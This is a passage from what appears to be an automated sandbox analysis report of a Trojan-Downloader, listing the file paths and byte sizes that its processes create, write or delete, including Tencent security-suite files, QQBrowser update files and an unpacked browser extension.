%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_127.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\UninstNetWork.dll (46 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\TencentNews.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEmDrv.sys (49 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMProcessRunningTime.dll (1176 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRTP.exe (3557 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\videocardmark.etf (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysspeeduprtpplugin\SysSpeedupRtpPlugin.dll (46 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMRouterPlugin.png (722 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1093.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\pluginctrl.xml (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCB2AndroidJmp_QO.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\tencentdl.exe (7433 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NodisturbOGList.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr05.def (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.tpc (818 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\MobileSoftMgr.dll (126 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\xImage.dll (2243 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetMon.sys (47 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.dll (6138 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_116.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10001.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSafeBoxHelperDll.dll (1222 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibblackac.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMBluescreenFixer\bugreport.exe (5919 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\QMRealTimeSpeedupSkinCenter\QMRealTimeSpeedupSkinCenter.zip (601 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMDnsPlugin.png (409 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQRepair.exe (1097 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCLeakScan_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1101.dat (446 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qmsxtboxplugin.png (822 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.tpc (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\arkGraphic.dll (3995 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FtSysCommonMgrGF.rdb (68 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCFileOpen.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\jgImage.dll (164 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1010.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\zlib.dll (1174 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCVulPlugin\QMSCVulPlugin.tpc (707 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\SpeedupMsg.dll (3960 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCfix.dll (8576 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.dll (3615 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1230.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\RefuseInjectShell.DAT (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_890.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMPerfCtrl\QMPerf.dll (2701 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\Common.dll (15539 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftGame.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTipsConfig.dat (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssocScanLib2.dat (53 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr02.def (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\Microsoft.VC80.ATL.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\zlib.dll (1033 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1408.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_123.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\CubeConfig.ini (108 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMMain.dll (17622 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\polyphone.dat (12 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRtpController.dll (1506 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\libjpegturbo.dll (3301 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHelper.sys (34 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_862.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.rdb (130 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.tpc (715 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOServicePlugin.etf (545 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileOpen.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMClinicsettingcenter\QMClinicSettingCenter.dll (4116 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\arkGraphic.dll (3659 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\libexpatw.dll (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSZip.dll (647 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\exnscan.dll (3547 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCAVSetting.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPConfig.exe (2049 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1020.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPSysScan\HPSysScanner.dll (2399 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAccountProtection.exe (10398 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QMHealthAssist_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\IEStartPage.tpc (707 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FtsysSoftIcon.dll (2098 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QMGameSpeedup_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMShield32.png (578 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRealTimeSpeedup.rdb (241 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\Bin\SSOCommon.dll (10861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\RemNPX.exe (1764 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\HPScanUIPlugin\HPScanUIPlugin.dll (6633 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\harddiskmark.etf (40 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCLeakScan.exe (7366 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\InstAsm.exe (1137 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVPedc.dll (2205 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\speech.dat (91 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQFileFlt.dll (838 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\StartupMgr.rdb (9005 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\PluginPackage\InstallCfg.xml (156 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.tpc (905 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\oDayProtect.dll (86 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\Common.dll (17134 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1031.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1223.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRealTimeSpeedup.exe (6074 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHW-x64.sys (512 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\xImage.dll (2533 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMAdFilter.png (545 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\sBoth_Disconnected.png (10 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\supplyID.xml (266 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.tpc (674 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1402.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TVL00001.tvl (6396 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSUrlLib.DAT (15 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\sm03.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\TurnOnAdapter.png (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMNetConnect.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\pinyin.lis (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1603.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TestStubConfig.xml (425 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\arkGraphic.dll (5320 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\com.qq.qmchext.json (209 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\xImage.dll (4051 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tssk.sys (1616 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Tencentdl.exe (9871 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1030.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virdex02.def (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10007.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMIESafeDll.dll (2233 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\I18N\2052\PGFStringBundle.xml (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1944.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCUpdate.dat (656 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1095.dat (452 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCMgr.exe (601 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsvulsha.dat (109 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSWebShieldInject.dll (1172 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinic.png (931 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMBDScanner.dat (35 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMNewsTips\QMNewsTips.rdb (22 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\RocketConfig.etf (406 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPExternalScan\HPFirewareScanner.dll (2370 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinicSys.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\qqpclaunch\QQPCLaunch.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernel.sys (852 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.rdb (3744 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_157.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\ATL80.dll (1915 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\libjpegturbo.dll (4099 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMClinicCore.dll (9313 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetflowOpti\NetflowOpti.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDns.dll (62 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.dll (1875 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCVulPage.rdb (1812 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\xImage.dll (2643 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\MalwareLogic.dll (2064 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftCmd.exe (3473 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_115.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1755.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloaderInfo.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DLProtectComm.dll (1722 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\CODConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10482.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant.rdb (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\net_err.jpg (15 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.dll (5038 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_657.png (794 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCAVSetting.exe (7102 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SoftUninstall\SoftUninstall.dll (5765 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\LoadError.html (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftTrayTips.rdb (492 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCLeakScan.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1415.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmsoftmgrupdate\QMSoftMgrUpdate.dll (2641 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\UDiskShellExt.dll (2502 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\QQPCMgrInstall_20160519101428.Log (0 bytes)
The process SogouSoftware.exe:216 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
The Trojan-Downloader deletes the following file(s):
The process QQBrowserLiveup.exe:1808 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\UpdateFiles\QQBrowser_Setup_9.4.7658.400_9.4.exe.qbl (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp\F1Assistant.dll (19686 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\UpdateFiles\desc.txt (1 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\UpdateFiles\QQBrowser_Setup_9.4.7658.400_9.4.exe.qbl (0 bytes)
The process InstAsm.exe:3332 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
The Trojan-Downloader deletes the following file(s):
The process MiniThunderPlatform.exe:2060 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
The Trojan-Downloader deletes the following file(s):
C:\SogouDownload\WiFi-2175.exe.td.cfg (0 bytes)
The process minidownload.exe:1832 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1.tmp (0 bytes)
The process %original file name%.exe:856 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
The process QQBrowser.exe:1268 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\ghgfpcpdfhmoghgepjalhnielnlemggj\9.0.0.31_0\BrowserProtect18.exe (3073 bytes)
The process QQBrowser.exe:2328 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\DECODED_MESSAGE_CATALOGS (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\DECODED_IMAGES (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\commenExtension.crx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_7365 (0 bytes)
The process QQBrowser.exe:2612 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\it\messages.json (487 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_maximize.png (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ja\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\vi\messages.json (723 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\th\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\de\messages.json (570 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sr\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_16.png (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\id\messages.json (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ca\messages.json (594 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\zh_TW\messages.json (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_hover.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\es\messages.json (585 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_pressed.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sv\messages.json (554 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\en\messages.json (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\tr\messages.json (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\el\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_close.png (252 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\flapper.gif (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\uk\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\bg\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ko\messages.json (763 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\da\messages.json (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\nl\messages.json (499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sl\messages.json (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\et\messages.json (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\lv\messages.json (640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pl\messages.json (603 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\zh_CN\messages.json (641 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sk\messages.json (596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pt_PT\messages.json (566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_metadata\verified_contents.json (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hr\messages.json (526 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fi\messages.json (602 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\en_GB\messages.json (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\css\craw_window.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hi\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\html\craw_window.html (810 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ru\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\craw_window.js (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\DECODED_IMAGES (66 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\nb\messages.json (533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hu\messages.json (667 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\cs\messages.json (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fil\messages.json (549 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pt_BR\messages.json (560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\DECODED_MESSAGE_CATALOGS (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\craw_background.js (12376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\lt\messages.json (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ro\messages.json (597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_128.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\es_419\messages.json (548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fr\messages.json (597 bytes)
The process QQBrowser.exe:3532 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
